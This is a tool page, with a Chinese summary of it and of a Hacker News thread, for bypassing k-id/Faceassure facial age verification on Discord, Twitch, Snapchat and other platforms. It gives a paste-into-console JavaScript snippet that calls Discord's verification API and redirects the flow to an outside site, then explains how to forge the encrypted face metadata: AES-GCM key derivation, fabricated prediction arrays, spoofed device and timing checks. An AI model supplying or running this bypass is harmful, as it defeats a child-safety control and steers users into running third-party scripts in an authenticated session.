绕过Discord/Twitch/Snapchat年龄验证

绕过Discord/Twitch/Snapchat年龄验证
Discord/Twitch/Snapchat age verification bypass

## Discord及其他平台的年龄验证绕过该工具由xyzeva和Dziurwa开发（基于amplitudes的先前工作），可自动验证使用k-id的平台（如Discord）的年龄，领先于3月份的全球推广。它通过规避k-id的面部验证过程来工作，*无需*发送您的实际面部数据。该工具使用粘贴到Discord控制台（通过F12访问）的脚本与Discord API交互。对于Discord，它会将您重定向到验证页面。对于其他平台（Twitch、Kick等），您需要输入其年龄验证过程中的二维码网址。 K-id依赖于关于您面部的元数据，而不是图像本身。该工具生成看起来合法的元数据，绕过k-id合作伙伴Faceassure实施的检查。它复制了加密过程（AES-GCM），并准确预测了k-id验证中使用的关键数据点（outputs、primaryOutputs、raws），包括设备和时间检查。整个过程是开源的，允许用户检查代码并完全理解绕过功能的工作原理。

Hacker News 上出现了一场关于绕过 Discord、Twitch 和 Snapchat 等平台使用的年龄验证系统的讨论（kibty.town）。核心观点是，目前的方法——很可能是面部扫描或身份验证——很容易被规避。用户建议生成人工视频输入来欺骗基于网络摄像头的验证，并认为即使要求使用手机摄像头也不会是长久之计，因为屏幕可以作为替代品。对话强调了数字年龄验证的“猫捉老鼠”游戏，并质疑这些系统的有效性。一位评论员指出，平台可能只是为了满足监管要求，而没有真正解决责任问题，因为验证很容易被绕过。还有关于平台将多久尝试修复此漏洞的猜测。

原文

age verifies your account automatically as an adult on any website using k-id

made by xyzeva and Dziurwa, greetz to amplitudes (for previous work)

how to verify on discord

it doesn't matter if you are in the UK or similar region that currently has access to this, this will verify your account for the future global rollout in march aswell as current. to use, simply paste this script into your discord console by going to discord.com/app, pressing F12, going to Console and copying and pasting and hitting enter on the following script and solving the captcha that pops up (typing "allow pasting" before if necessary):

// add a chunk to get all of the webpack chunks
_mods = webpackChunkdiscord_app.push([[Symbol()],{},r=>r.c]);
webpackChunkdiscord_app.pop(); // cleanup the chunk we added

// utility to find a webpack chunk by property
findByProps = (...props) => {
    for (let m of Object.values(_mods)) {
        try {
            if (!m.exports || m.exports === window) continue;
            if (props.every((x) => m.exports?.[x])) return m.exports;

            for (let ex in m.exports) {
                if (props.every((x) => m.exports?.[ex]?.[x]) && m.exports[ex][Symbol.toStringTag] !== 'IntlMessagesProxy') return m.exports[ex];
            }
        } catch {}
    }
}


// find the discord api client
api = findByProps('Bo','oh').Bo

// send a api request to discord /age-verification/verify and then redirect the page to our website
window.location.href = `https://age-verifier.kibty.town/webview?url=${encodeURIComponent((await api.post({ url: '/age-verification/verify', body: { method: 3 }})).body.verification_webview_url)}`

(feel free to read the code, we made it readable and we have nothing to hide)

it should navigate to a link (or give you a link to navigate to), from there, you can just wait until the page says success

congrats! your discord account is now age verified.

how to verify on other platforms (twitch, kick, snapchat, ...others)

navigate to the age verification page and choose selfie, from there, get the url of the qr code and put it in this input box, and press verify

how does this work

k-id, the age verification provider discord uses doesn't store or send your face to the server. instead, it sends a bunch of metadata about your face and general process details. while this is good for your privacy (well, considering some other providers send actual videos of your face to their servers), its also bad for them, because we can just send legitimate looking metadata to their servers and they have no way to tell its not legitimate.
while this was easy in the past, k-id's partner for face verification (faceassure) has made this significantly harder to achieve after amplitudes k-id verifier was released, (which doesn't work anymore because of it.)

with discord's decision of making the age verification requirement global, we decided to look into it again to see if we can bypass the new checks.

step 1: encrypted_payload and auth_tag

the first thing we noticed that the old implementation doesn't send when comparing a legitimate request payload with a generated one, is its missing encrypted_payload, auth_tag, timestamp and iv in the body.

looking at the code, this appears to be a simple AES-GCM cipher with the key being nonce + timestamp + transaction_id, derived using HKDF (sha256). we can easily replicate this and also create the missing parameters in our generated output.

step 2: prediction data

heres where it kind of gets tricky, even after perfectly replicating the encryption, our verification attempt still doesn't succeed, so they must also be doing checks on the actual payload.

after some trial and error, we narrowed the checked part to the prediction arrays, which are outputs, primaryOutputs and raws.

turns out, both outputs and primaryOutputs are generated from raws. basically, the raw numbers are mapped to age outputs, and then the outliers get removed with z-score (once for primaryOutputs and twice for outputs).

there is also some other differences:

xScaledShiftAmt and yScaledShiftAmt in predictions are not random but rather can be one of two values
it is checked that the media name (camera) matches one of your media devices in the array of devices
it is checked if the states completion times match the state timeline

with all of that done, all of this code is open source and available , so you can actually see how we do this exactly.